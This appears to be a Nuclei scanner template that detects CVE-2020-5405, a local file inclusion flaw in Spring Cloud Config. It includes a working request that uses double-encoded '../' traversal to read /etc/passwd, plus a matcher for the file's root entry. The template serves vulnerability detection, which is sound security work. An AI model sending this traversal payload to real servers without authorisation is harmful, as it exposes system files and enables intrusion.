id: CVE-2020-5405 info: name: Spring Cloud Config - Local File Inclusion author: harshbothra_ severity: medium description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. reference: - https://pivotal.io/security/cve-2020-5405 - https://nvd.nist.gov/vuln/detail/CVE-2020-5405 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2020-5405 cwe-id: CWE-22,CWE-23 epss-score: 0.00258 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware product: spring_cloud_config tags: cve,cve2020,lfi,springcloud http: - method: GET path: - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd' matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200